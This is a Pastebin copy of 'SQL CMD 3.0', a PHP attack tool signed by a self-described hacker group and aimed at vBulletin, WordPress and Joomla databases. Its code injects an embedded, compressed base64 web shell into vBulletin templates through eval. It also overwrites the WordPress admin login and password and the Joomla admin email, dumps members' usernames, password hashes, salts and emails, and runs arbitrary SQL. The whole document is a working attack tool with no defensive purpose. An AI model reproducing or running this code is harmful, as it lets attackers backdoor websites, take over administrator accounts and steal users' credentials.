API tools faq
paste
TrojanSpot

SQL CMD 3.0 | www.pemula.info

TrojanSpot
Sep 21st, 2012
285
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 22.64 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <?
  4. /*------------------------------------------------------------------*\
  5. | ************        SQL_CMD 3.0 by al-swisre           ***********|
  6. +-----------------------------------------------------------------|
  7. |                   حقوق الملف محفوظة لـ al-swisre               |
  8. |                            oy3@hotmail.com                    |
  9. |                           Copyright ©2011 .                  |
  10. \*-----------------------------------------------------------*/
  11. ?>
  12. <head>
  13. <title>SQL CMD 3.0 | al-swisre</title>
  14. <meta http-equiv="content=type"  content="text/html; charset=utf-8" />
  15. <style type="text/css">
  16.  
  17.   html,body {
  18.      margin: 0;
  19.      padding: 0;
  20.      outline: 0;
  21. }
  22.  
  23.  
  24. body {
  25.     direction: rtl;
  26.  background-color: #000000;
  27.     color: #cccccc;
  28.      }
  29.  
  30. input,textarea,select{
  31. font-weight: bold;
  32. color: #cccccc;
  33. dashed #ffffff;
  34. border: 1px
  35. solid #2C2C2C;
  36. background-color: #080808
  37. }
  38.  
  39.  
  40. .all
  41. {
  42.   margin-left: auto;
  43.   margin-right: auto;
  44.   width: 60%;
  45.   box-shadow: 0px 0px 4px #888888;
  46.   direction: ltr;
  47.  
  48. }
  49. .hdr{
  50.   font-family:Tahoma, Arial, sans-serif;
  51.   font-size: 27px;
  52.   color:#BBBBBB;
  53.   font-weight: bold;
  54.   text-align: center;
  55. }
  56. .com{
  57.  
  58.   font-size: 18px;
  59.   font-family:Tahoma, Arial, sans-serif;
  60.   color: #BBBBBB;
  61.   text-shadow: #FF0000;
  62. }
  63.  
  64. .foter{
  65.   font-size: 9pt;
  66.   color:  #444444 ;
  67.   text-align: center
  68. }
  69. #drp{
  70.   width:150px;
  71.   position: absolute;
  72.  
  73.   float: none;
  74.  
  75. }
  76.  
  77.  
  78. #rok{
  79.   text-decoration: none;
  80.   padding : 4px;
  81.   list-style: none;
  82.   float: left;
  83. }
  84. #rok a{
  85.   text-decoration: none;
  86.   color: #cccccc;
  87.   font-size: 10pt;
  88.   margin-left: 2px;
  89.   list-style: none;
  90.   padding : 4px;
  91.  
  92. }
  93. .nvbr{
  94.   border-top: 1px #222222 dashed;
  95.   height: 33px;
  96.   background: #000000;
  97.   border-bottom: 1px #222222 dashed;
  98.   font-family: Tahoma, Arial, sans-serif ;
  99.   font-weight: bold;
  100. }
  101.  
  102. .nvbr ul{
  103.  list-style: none;
  104.  margin: 0;
  105.  padding: 0;
  106.  
  107. }
  108.  
  109. .nvbr ul li{
  110.   float: left;
  111.  
  112. }
  113.  
  114. .nvbr ul li a{
  115.  display: block;
  116.  text-decoration: none;
  117.  padding: 10px 9px 10px 9px;
  118.   color: #999999   ;
  119.   font-size: 12px;
  120. }
  121.  
  122. .nvbr ul li a:hover{
  123.  color: #FFFFFF;
  124.  box-shadow: 0px 0px 3px #cccccc ;
  125.  text-shadow: 0px 0px 3px #FFFFFF;
  126. }
  127.  
  128. #drp{
  129.  list-style: none;
  130.  direction: ltr;
  131.   width:150px;
  132.   position: absolute;
  133.   display: none;
  134.   border-bottom:solid 1px #222222;
  135.   border-left: solid 1px #222222;
  136.   border-right: solid 1px #222222;
  137. }
  138.  
  139. #drp{
  140.   float: none;
  141. }
  142.  
  143. #rok:hover #drp{
  144.  display: block;
  145.  background: #000000;
  146.  }
  147.  .tbm{
  148.  font-size: 14px;
  149. }
  150.  
  151. .tbm tr td{
  152.  border: dashed 1px #111111;
  153.  
  154. }
  155.  
  156.  
  157.  
  158.  
  159.  
  160. </style>
  161. </head>
  162.  
  163. <body>
  164. <br />
  165. <div class="all" >
  166.  
  167. <br /><div class="hdr">SQL CMD 3.0</div><br />
  168. <?php
  169. $peag = basename(__FILE__);
  170.  
  171. echo'
  172. <div class="nvbr">
  173. <ul>
  174. <li><a href="'.$peag.'">SQL CMD</a>
  175.  
  176. </li>
  177. </ul>
  178.  
  179. <ul>
  180. <li id="rok"><a href="">vBulletin</a>
  181.  
  182. <div id="drp">
  183. <ul><a href="?sws=1" >Inject index</a> </ul>
  184. <ul><a href="?sws=4" >Inject faq</a> </ul>
  185. <ul><a href="?sws=5" >Inject calendar</a> </ul>
  186. <ul><a href="?sws=6" >Inject search</a> </ul>
  187. <ul><a href="?sws=7" >show members</a> </ul>
  188. </div>
  189.  
  190. </li>
  191. </ul>
  192.  
  193.  </ul>
  194.  
  195. <ul>
  196. <li id="rok"><a href="">WordPress</a>
  197.  
  198. <div id="drp">
  199. <ul><a href="?sws=2" >Change admin</a> </ul>
  200. <ul><a href="?sws=8" >show members</a> </ul>
  201. </div>
  202.  
  203. </li>
  204. </ul>
  205.  
  206.  <ul>
  207. <li id="rok"><a href="">Joomla</a>
  208.  
  209. <div id="drp">
  210. <ul><a href="?sws=3" >Change admin</a> </ul>
  211. <ul><a href="?sws=9" >show members</a> </ul>
  212. </div>
  213.  
  214. </li>
  215. </ul>
  216.  
  217. </div>';
  218. ?>
  219.  
  220. <?php
  221.  
  222.  
  223. $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  224.  
  225. if(isset($_REQUEST['sws']))
  226. {
  227.  
  228. switch ($_REQUEST['sws'])
  229. {
  230.  
  231. case 1:
  232.  
  233. echo '
  234.  
  235. <div class="com">
  236. <form method="post">
  237. <table cellpadding="4" align="center" width="35%" class="tab">
  238. <br />
  239.  
  240. <tr">
  241.     <td>Host :</td>
  242.     <td><input type="text" name="host" value="localhost" /></td>
  243. </tr>
  244.  
  245. <tr ">
  246.     <td>user&nbsp;:</td>
  247.     <td><input type="text" name="user" /></td>
  248. </tr>
  249.  
  250. <tr>
  251.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  252.  
  253. </tr>
  254.  
  255. <tr>
  256.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  257.     <td><input type="text" name="db" /></td>
  258. </tr>
  259. </table>
  260. <table class="tab2" cellpadding="4" align="center" width="45%">
  261. <tr>
  262.     <td >Your index :</td>
  263.     <td><textarea rows="3" name="index"></textarea></td>
  264. </tr>
  265.  
  266.  
  267. <tr>
  268.  
  269.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  270.  
  271. </tr>
  272.  </table>
  273. </form>  </div>';
  274. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb >>>>>>>>>>>>>>>>>>>>>>>>
  275.  $host = $_POST['host'];
  276. $user = $_POST['user'];
  277. $pass = $_POST['pass'];
  278. $db   = $_POST['db'];
  279. $index  = $_POST['index'];
  280.  
  281. if(isset($host) ) {
  282. $con =@ mysql_connect($host,$user,$pass) or die ;
  283. $sedb =@ mysql_select_db($db) or die;
  284. $index=str_replace("\'","'",$index);
  285. $crypt  = "{\${eval(base64_decode(\'";
  286. $crypt .= base64_encode("echo \"$index\";");
  287. $crypt .= "\'))}}{\${exit()}}</textarea>";
  288. $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
  289. $query =@ mysql_query($sqlindex,$con);
  290.  
  291. if ($query)
  292. {
  293.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  294. }
  295. else if (!$query)
  296. {
  297.   echo "error";
  298. }
  299.  
  300. }else
  301. {
  302.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  303. }
  304.   break;
  305.  
  306.  
  307. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< wp >>>>>>>>>>>>>>>>>>>>>>>>
  308.  
  309.   case 2:
  310.  
  311.   echo '
  312.  
  313. <div class="com">
  314. <form method="post">
  315. <table cellpadding="4" align="center" width="35%" class="tab">
  316. <br />
  317.  
  318. <tr">
  319.     <td>Host :</td>
  320.     <td><input type="text" name="host" value="localhost" /></td>
  321. </tr>
  322.  
  323. <tr ">
  324.     <td>user&nbsp;:</td>
  325.     <td><input type="text" name="user" /></td>
  326. </tr>
  327.  
  328. <tr>
  329.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  330.  
  331. </tr>
  332.  
  333. <tr>
  334.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  335.     <td><input type="text" name="db" /></td>
  336. </tr>
  337. </table>
  338. <table cellpadding="4" align="center" width="45%" class="tab">
  339.  
  340. <tr>
  341.     <td>user admin&nbsp;&nbsp;&nbsp;:</td>
  342.     <td><input type="text" name="useradmin" /></td>
  343. </tr>
  344. <tr>
  345.     <td>pass admin&nbsp;&nbsp;&nbsp;:</td>
  346.     <td><input type="text" name="passadmin" /></td>
  347. </tr>
  348.  
  349. <tr>
  350.  
  351.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  352.  
  353. </tr>
  354.  </table>
  355. </form> </div>';
  356.  
  357. $host       = $_POST['host'];
  358. $user       = $_POST['user'];
  359. $pass       = $_POST['pass'];
  360. $db         = $_POST['db'];
  361. $useradmin  = $_POST['useradmin'];
  362. $pass_ad    = $_POST['passadmin'];
  363.  
  364.  
  365.  
  366. if(isset($host) ) {
  367. $con =@ mysql_connect($host,$user,$pass) or die ;
  368. $sedb =@ mysql_select_db($db) or die;
  369.  
  370. $crypt = crypt($pass_ad);
  371.  
  372.  
  373. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die;
  374. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
  375.  
  376.  
  377.  
  378. if ($query)
  379. {
  380.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  381. }
  382. else if (!$query)
  383. {
  384.   echo "error";
  385. }
  386.  
  387. }else
  388. {
  389.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  390. }
  391.  
  392.  
  393.  
  394.   break;
  395.  
  396.  
  397.  
  398. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< joomla >>>>>>>>>>>>>>>>>>>>>>>>
  399.  
  400.   case 3:
  401.   echo '
  402.  
  403. <div class="com">
  404. <form method="post">
  405. <table cellpadding="4" align="center" width="35%" class="tab">
  406. <br />
  407.  
  408. <tr">
  409.     <td>Host :</td>
  410.     <td><input type="text" name="host" value="localhost" /></td>
  411. </tr>
  412.  
  413. <tr ">
  414.     <td>user&nbsp;:</td>
  415.     <td><input type="text" name="user" /></td>
  416. </tr>
  417.  
  418. <tr>
  419.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  420.  
  421. </tr>
  422.  
  423. <tr>
  424.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  425.     <td><input type="text" name="db" /></td>
  426. </tr>
  427. </table>
  428. <table cellpadding="4" align="center" width="50%" class="tab">
  429.  
  430. <tr>
  431.     <td>dbprefix&nbsp;&nbsp;&nbsp;&nbsp;:</td>
  432.     <td><input type="text" name="jop" value="jos_users" /></td>
  433. </tr>
  434.  
  435.  
  436. <tr>
  437.     <td>Email admin&nbsp;&nbsp;&nbsp;:</td>
  438.     <td><input type="text" name="email" /></td>
  439. </tr>
  440.  
  441.  
  442. <tr>
  443.  
  444.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  445.  
  446. </tr>
  447.  </table>
  448. </form> </div>';
  449.  
  450. $host = $_POST['host'];
  451. $user = $_POST['user'];
  452. $pass = $_POST['pass'];
  453. $db   = $_POST['db'];
  454. $jop  = $_POST['jop'];
  455. $email  = $_POST['email'];
  456.  
  457. if(isset($host) ) {
  458. $con =  @ mysql_connect($host,$user,$pass) or die ;
  459. $sedb = @ mysql_select_db($db) or die;
  460.  
  461.  
  462. $query= @ mysql_query("UPDATE $jop SET email ='".$email."' WHERE id = 1") or die;
  463.  
  464.  
  465.  
  466. if ($query)
  467. {
  468.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  469. }
  470. else if (!$query)
  471. {
  472.   echo "error";
  473. }
  474.  
  475. }else
  476. {
  477.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  478. }
  479.  
  480.  
  481.   break;
  482. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell FAQ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  483.   case 4:
  484.   echo '
  485.  
  486. <div class="com">
  487. <form method="post">
  488. <table cellpadding="4" align="center" width="35%" class="tab">
  489. <br />
  490.  
  491. <tr">
  492.     <td>Host :</td>
  493.     <td><input type="text" name="host" value="localhost" /></td>
  494. </tr>
  495.  
  496. <tr ">
  497.     <td>user&nbsp;:</td>
  498.     <td><input type="text" name="user" /></td>
  499. </tr>
  500.  
  501. <tr>
  502.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  503.  
  504. </tr>
  505.  
  506. <tr>
  507.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  508.     <td><input type="text" name="db" /></td>
  509. </tr>
  510.  
  511. </table>
  512. <table class="tab2" cellpadding="4" align="center" width="45%">
  513. <tr>
  514.      <td> <br /><center>Injection Shell in faq.php</center><br /> </td>
  515. </tr>
  516.  
  517. <tr>
  518.  
  519.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  520.  
  521. </tr>
  522.  </table>
  523. </form>  </div>';
  524.  
  525. $host = $_POST['host'];
  526. $user = $_POST['user'];
  527. $pass = $_POST['pass'];
  528. $db   = $_POST['db'];
  529. $faq  = $_POST['index'];
  530.  
  531. if(isset($host) ) {
  532. $con =@ mysql_connect($host,$user,$pass) or die ;
  533. $sedb =@ mysql_select_db($db) or die;
  534. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  535. $crypt .= "$shell";
  536. $crypt .= "\')))}}{\${exit()}}</textarea>";
  537. $sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  538. $query =@ mysql_query($sqlfaq,$con);
  539.  
  540. if ($query)
  541. {
  542.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  543. }
  544. else if (!$query)
  545. {
  546.   echo "error";
  547. }
  548.  
  549. }else
  550. {
  551.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  552. }
  553.   break;
  554.  
  555.  
  556.  
  557. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell CALENDAR >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  558.   case 5:
  559. echo '
  560.  
  561. <div class="com">
  562. <form method="post">
  563. <table cellpadding="4" align="center" width="35%" class="tab">
  564. <br />
  565.  
  566. <tr">
  567.     <td>Host :</td>
  568.     <td><input type="text" name="host" value="localhost" /></td>
  569. </tr>
  570.  
  571. <tr ">
  572.     <td>user&nbsp;:</td>
  573.     <td><input type="text" name="user" /></td>
  574. </tr>
  575.  
  576. <tr>
  577.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  578.  
  579. </tr>
  580.  
  581. <tr>
  582.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  583.     <td><input type="text" name="db" /></td>
  584. </tr>
  585. </table>
  586. <table class="tab2" cellpadding="4" align="center" width="45%">
  587. <tr>
  588.      <td> <br /><center>Injection Shell in calendar.php</center><br /> </td>
  589. </tr>
  590.  
  591.  
  592. <tr>
  593.  
  594.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  595.  
  596. </tr>
  597.  </table>
  598. </form>  </div>';
  599. //
  600. $host = $_POST['host'];
  601. $user = $_POST['user'];
  602. $pass = $_POST['pass'];
  603. $db   = $_POST['db'];
  604. $index  = $_POST['index'];
  605.  
  606. if(isset($host) ) {
  607. $con =@ mysql_connect($host,$user,$pass) or die ;
  608. $sedb =@ mysql_select_db($db) or die;
  609. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  610. $crypt .= "$shell";
  611. $crypt .= "\')))}}{\${exit()}}</textarea>";
  612. $sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'" ;
  613. $query =@ mysql_query($sqlfaq,$con);
  614.  
  615. if ($query)
  616. {
  617.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  618. }
  619. else if (!$query)
  620. {
  621.   echo "error";
  622. }
  623.  
  624. }else
  625. {
  626.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  627. }
  628.   break;
  629.  
  630. // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb shell search >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  631.  
  632.   case 6:
  633. echo '
  634.  
  635. <div class="com">
  636. <form method="post">
  637. <table cellpadding="4" align="center" width="35%" class="tab">
  638. <br />
  639.  
  640. <tr">
  641.     <td>Host :</td>
  642.     <td><input type="text" name="host" value="localhost" /></td>
  643. </tr>
  644.  
  645. <tr ">
  646.     <td>user&nbsp;:</td>
  647.     <td><input type="text" name="user" /></td>
  648. </tr>
  649.  
  650. <tr>
  651.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  652.  
  653. </tr>
  654.  
  655. <tr>
  656.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  657.     <td><input type="text" name="db" /></td>
  658. </tr>
  659. <table class="tab2" cellpadding="4" align="center" width="45%">
  660. <tr>
  661.      <td> <br /><center>Injection Shell in search.php</center><br /> </td>
  662. </tr>
  663.  
  664.  
  665. <tr>
  666.  
  667.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  668.  
  669. </tr>
  670.  </table>
  671. </form>  </div>';
  672.  
  673. $host = $_POST['host'];
  674. $user = $_POST['user'];
  675. $pass = $_POST['pass'];
  676. $db   = $_POST['db'];
  677. $index  = $_POST['index'];
  678.  
  679. if(isset($host) ) {
  680. $con =@ mysql_connect($host,$user,$pass) or die ;
  681. $sedb =@ mysql_select_db($db) or die;
  682. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  683. $crypt .= "$shell";
  684. $crypt .= "\')))}}{\${exit()}}</textarea>";
  685. $sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'" ;
  686. $query =@ mysql_query($sqlfaq,$con);
  687.  
  688. if ($query)
  689. {
  690.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  691. }
  692. else if (!$query)
  693. {
  694.   echo "error";
  695. }
  696.  
  697. }else
  698. {
  699.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  700. }
  701.   break;
  702.  
  703.  
  704. // <<<<<<<<<<<<<<<<<<<<<< vb members >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  705.   case 7:
  706.  
  707.   echo '
  708.  
  709. <div class="com">
  710. <form method="post">
  711. <table cellpadding="4" align="center" width="35%" class="tab">
  712. <br />
  713.  
  714. <tr">
  715.     <td>Host :</td>
  716.     <td><input type="text" name="host" value="localhost" /></td>
  717. </tr>
  718.  
  719. <tr ">
  720.     <td>user&nbsp;:</td>
  721.     <td><input type="text" name="user" /></td>
  722. </tr>
  723.  
  724. <tr>
  725.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  726.  
  727. </tr>
  728.  
  729. <tr>
  730.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  731.     <td><input type="text" name="db" /></td>
  732. </tr>
  733. <table class="tab2" cellpadding="4" align="center" width="45%">
  734. <tr>
  735.      <td> <br /><center>show members Information</center><br /> </td>
  736. </tr>
  737.  
  738.  
  739. <tr>
  740.  
  741.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  742.  
  743. </tr>
  744.  </table>
  745. </form>  </div>';
  746.  
  747. $host = $_POST['host'];
  748. $user = $_POST['user'];
  749. $pass = $_POST['pass'];
  750. $db   = $_POST['db'];
  751. $index  = $_POST['index'];
  752.  
  753. if(isset($host) ) {
  754. $con =@ mysql_connect($host,$user,$pass) or die ;
  755. $sedb =@ mysql_select_db($db) or die;
  756. $sql = 'select * from `user`';
  757. $query =@ mysql_query($sql,$con);
  758.  
  759. if ($query)
  760. {
  761.  
  762. while ($row = mysql_fetch_assoc($query))
  763. {
  764.  
  765. echo "
  766. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  767. <tr>
  768.       <td>ID :</td>
  769.       <td>user :</td>
  770.       <td>pass :</td>
  771.       <td>salt :</td>
  772.       <td>email :</td>
  773.  
  774. </tr>
  775.  
  776. <tr>
  777.       <td>".$row['userid']."</td>
  778.       <td>".$row['username']."</td>
  779.       <td>".$row['password']."</td>
  780.        <td>".$row['salt']."</td>
  781.        <td>".$row['email']."</td>
  782. </tr>
  783.  
  784. </table>
  785.                                                     -
  786.  ";
  787.  
  788. }
  789.  
  790.   }
  791. else if (!$query)
  792. {
  793.   echo "error";
  794. }
  795.  
  796. }else
  797. {
  798.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  799. }
  800.  
  801.  
  802.   break;
  803.  
  804.   case 8:
  805.  
  806.  
  807.   echo '
  808.  
  809. <div class="com">
  810. <form method="post">
  811. <table cellpadding="4" align="center" width="35%" class="tab">
  812. <br />
  813.  
  814. <tr">
  815.     <td>Host :</td>
  816.     <td><input type="text" name="host" value="localhost" /></td>
  817. </tr>
  818.  
  819. <tr ">
  820.     <td>user&nbsp;:</td>
  821.     <td><input type="text" name="user" /></td>
  822. </tr>
  823.  
  824. <tr>
  825.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  826.  
  827. </tr>
  828.  
  829. <tr>
  830.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  831.     <td><input type="text" name="db" /></td>
  832. </tr>
  833. <table class="tab2" cellpadding="4" align="center" width="45%">
  834. <tr>
  835.      <td> <br /><center>show members Information</center><br /> </td>
  836. </tr>
  837.  
  838.  
  839. <tr>
  840.  
  841.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  842.  
  843. </tr>
  844.  </table>
  845. </form>  </div>';
  846.  
  847. $host = $_POST['host'];
  848. $user = $_POST['user'];
  849. $pass = $_POST['pass'];
  850. $db   = $_POST['db'];
  851. $index  = $_POST['index'];
  852.  
  853. if(isset($host) ) {
  854. $con =@ mysql_connect($host,$user,$pass) or die ;
  855. $sedb =@ mysql_select_db($db) or die;
  856. $sql = 'select * from `wp_users`';
  857. $query =@ mysql_query($sql,$con);
  858.  
  859. if ($query)
  860. {
  861.  
  862. while ($row = mysql_fetch_assoc($query))
  863. {
  864.  
  865. echo "
  866. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  867. <tr>
  868.       <td>ID :</td>
  869.       <td>user :</td>
  870.       <td>pass :</td>
  871.       <td>email :</td>
  872.  
  873. </tr>
  874.  
  875. <tr>
  876.       <td>".$row['ID']."</td>
  877.       <td>".$row['user_login']."</td>
  878.       <td>".$row['user_pass']."</td>
  879.        <td>".$row['user_email']."</td>
  880. </tr>
  881.  
  882. </table>
  883.  
  884.  ";
  885.  
  886. }
  887.  
  888.   }
  889. else if (!$query)
  890. {
  891.   echo "error";
  892. }
  893.  
  894. }else
  895. {
  896.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  897. }
  898.  
  899.  
  900.   break;
  901.  
  902.  
  903.     case 9:
  904.  
  905.  
  906.   echo '
  907.  
  908. <div class="com">
  909. <form method="post">
  910. <table cellpadding="4" align="center" width="35%" class="tab">
  911. <br />
  912.  
  913. <tr">
  914.     <td>Host :</td>
  915.     <td><input type="text" name="host" value="localhost" /></td>
  916. </tr>
  917.  
  918. <tr ">
  919.     <td>user&nbsp;:</td>
  920.     <td><input type="text" name="user" /></td>
  921. </tr>
  922.  
  923. <tr>
  924.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  925.  
  926. </tr>
  927.  
  928. <tr>
  929.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  930.     <td><input type="text" name="db" /></td>
  931. </tr>
  932. </table>
  933. <table class="tab2" cellpadding="4" align="center" width="45%">
  934.  
  935.  
  936. <tr>
  937.     <td>Table user :</td>
  938.     <td colspan="6"><input type="text" name="jop" value="jos_users" /></td>
  939. </tr>
  940. </table>
  941.  
  942. <table class="tab2" cellpadding="4" align="center" width="45%">
  943. <tr>
  944.      <td> <br /><center>show members Information</center><br /> </td>
  945. </tr>
  946.  
  947.  
  948. <tr>
  949.  
  950.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  951.  
  952. </tr>
  953.  </table>
  954. </form>  </div>';
  955.  
  956. $host = $_POST['host'];
  957. $user = $_POST['user'];
  958. $pass = $_POST['pass'];
  959. $db   = $_POST['db'];
  960. $jop  = $_POST['jop'];
  961.  
  962. if(isset($host) ) {
  963. $con =@ mysql_connect($host,$user,$pass) or die ;
  964. $sedb =@ mysql_select_db($db) or die;
  965. $sql = 'select * from `bo74r_users`';
  966. $query =@ mysql_query($sql,$con);
  967.  
  968. if ($query)
  969. {
  970.  
  971. while ($row = mysql_fetch_assoc($query))
  972. {
  973.  
  974. echo "
  975. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  976. <tr>
  977.       <td>ID :</td>
  978.       <td>user :</td>
  979.       <td>pass :</td>
  980.       <td>email :</td>
  981.  
  982. </tr>
  983.  
  984. <tr>
  985.       <td>".$row['id']."</td>
  986.       <td>".$row['username']."</td>
  987.       <td>".$row['password']."</td>
  988.        <td>".$row['email']."</td>
  989. </tr>
  990.  
  991. </table>
  992.  
  993.  ";
  994.  
  995. }
  996.  
  997.   }
  998. else if (!$query)
  999. {
  1000.   echo "error";
  1001. }
  1002.  
  1003. }else
  1004. {
  1005.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  1006. }
  1007.  
  1008.  
  1009.   break;
  1010.  
  1011.  
  1012.  
  1013.  
  1014.  
  1015.  
  1016.   default:
  1017.   header("Location: $peag");
  1018.  
  1019.  
  1020.  
  1021.   }
  1022.   }
  1023.  
  1024.  
  1025.  
  1026. else
  1027. {
  1028. echo '
  1029.  
  1030. <div class="com">
  1031. <form method="post">
  1032. <table cellpadding="4" align="center" width="35%" class="tab">
  1033. <br />
  1034.  
  1035. <tr">
  1036.     <td>Host :</td>
  1037.     <td><input type="text" name="host" value="localhost" /></td>
  1038. </tr>
  1039.  
  1040. <tr ">
  1041.     <td>user&nbsp;:</td>
  1042.     <td><input type="text" name="user" /></td>
  1043. </tr>
  1044.  
  1045. <tr>
  1046.     <td>Pass :</td><td><input type="text" name="pass"/></td>
  1047.  
  1048. </tr>
  1049.  
  1050. <tr>
  1051.     <td>db&nbsp;&nbsp;&nbsp;:</td>
  1052.     <td><input type="text" name="db" /></td>
  1053. </tr>
  1054. </table>
  1055. <table class="tab2" cellpadding="4" align="center" width="45%">
  1056. <tr>
  1057.     <td >SQL CMD :</td>
  1058.     <td><textarea rows="3" name="sql"></textarea></td>
  1059. </tr>
  1060.  
  1061.  
  1062. <tr>
  1063.  
  1064.      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>
  1065.  
  1066. </tr>
  1067.  </table>
  1068. </form> </div>';
  1069.  
  1070. $host = $_POST['host'];
  1071. $user = $_POST['user'];
  1072. $pass = $_POST['pass'];
  1073. $db   = $_POST['db'];
  1074. $sql  = $_POST['sql'];
  1075.  
  1076. if(isset($host) ) {
  1077. $con =@ mysql_connect($host,$user,$pass) or die ;
  1078. $sedb =@ mysql_select_db($db) or die;
  1079.  
  1080. $query =@ mysql_query($sql,$con) or die;
  1081.  
  1082. if ($query)
  1083. {
  1084.   echo "<center><br /><div class='com'>~_^ تم الاستعلام<br /><br /></div></center>";
  1085. }
  1086. else if (!$query)
  1087. {
  1088.   echo "error";
  1089. }
  1090.  
  1091. }else
  1092. {
  1093.   echo "<center><br /><div class='com'>! ادخل بيانات القاعدة <br /><br /></div></center>";
  1094. }
  1095. }
  1096. ?>
  1097.  
  1098. </div>
  1099.  
  1100. <div class="foter"><br /><br />Cod3d by : al-swisre _ oy3@hotmail.com<br /> <br />Saudi Arabia h4x0rS</div>
  1101. <br />
  1102. <!--
